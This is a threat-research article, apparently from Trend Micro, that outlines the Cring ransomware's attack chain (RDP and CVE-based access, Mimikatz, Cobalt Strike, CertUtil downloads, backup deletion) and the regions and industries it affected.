Examining the Cring Ransomware Techniques Sr. Threat Research Engineer

September 24, 2021 TH Author Trend Micro Research : Articles, News, Reports, Trend Micro Research : Endpoints, Trend Micro Research : Ransomware, Trend Micro Research : Research

Here is a more detailed description of this chain:

Initial Access

The Cring ransomware gains initial access either through unsecure or compromised RDP or valid accounts.

The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).

Credential Access

Threat actors behind Cring used weaponized tools in their attacks. One of these tools is Mimikatz, which was used to steal account credentials of users who had previously logged into the system.

Lateral Movement and Defense Evasion

Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system’s defenses.

Command and Control and Execution

Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.

BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download.

Impact

Once Cring has been executed in the system, it disables services and processes that might hinder the ransomware’s encryption routine. The threat will also delete backup files and folders. This will make restoring the encrypted files difficult for the victim, thereby placing more pressure on them to pay the ransom.

The ransomware will then proceed with its encryption routine and delete itself using a BAT file.

Based on our data, most of the Cring ransomware detections for attempted attacks were observed in Europe and the Middle East and Africa (EMEA) region. There have also been incidents in the Latin American Region (LAR), Asia Pacific (APAC), and North America (NABU).

The affected countries in the said regions were Azerbaijan, Brazil, Italy, Mexico, Saudi Arabia, the United States, and Turkey. With regard to industries, detections affected the finance and transportation sectors. Indeed, ransomware has been consistently attacking critical industries, as we discuss our midyear report.

You May Also Like

Analyzing How TeamTNT Used Compromised Docker Hub Accounts

ENISA says System Failure is on the Rise

SMS PVA Services’ Use of Infected Android Phones Reveals Flaws in SMS Verification